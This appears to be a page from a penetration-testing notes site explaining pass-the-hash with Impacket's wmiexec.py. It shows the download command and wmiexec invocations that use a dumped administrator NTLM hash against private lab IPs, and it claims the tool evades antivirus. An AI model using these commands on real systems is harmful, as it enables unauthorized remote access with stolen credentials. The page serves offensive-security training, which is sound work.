Pass The Hash with Winpexec.py

Download winpexec.py

Now that we have translated our captured Net-NTLM login into a local Admin NTLM hash, we can attempt to pass said hash to gain internal access to the machine. There are 3 main methods I have used to significant effect:

Wmiexec is another Impacket remote command that uses WMIC to send commands and can bypass AV that catches smbexec.

wget https://raw.githubusercontent.com/fortra/impacket/master/examples/wmiexec.py

Pass the Hash

we are using the hash obtained from lsassy, donpapi and sam dump.

wmiexec.py -hashes '00000000000000000000000000000000:dbd13e1c4e338284ac4e9874f7de6ef4' administrator@192.168.56.22
whoami
ipconfig
hostname

wmiexec.py -hashes '00000000000000000000000000000000:dbd13e1c4e338284ac4e9874f7de6ef4' administrator@192.168.56.11
whoami
ipconfig
hostname

Note: You have to replace the front part of the NTLM hash with 0’s in order for this to work.

PreviousDonPapi NextPass The Hash with Evil-Winrm

Last updated 2 years ago

hashtagDownload winpexec.py

hashtagPass the Hash

Download winpexec.py

Pass the Hash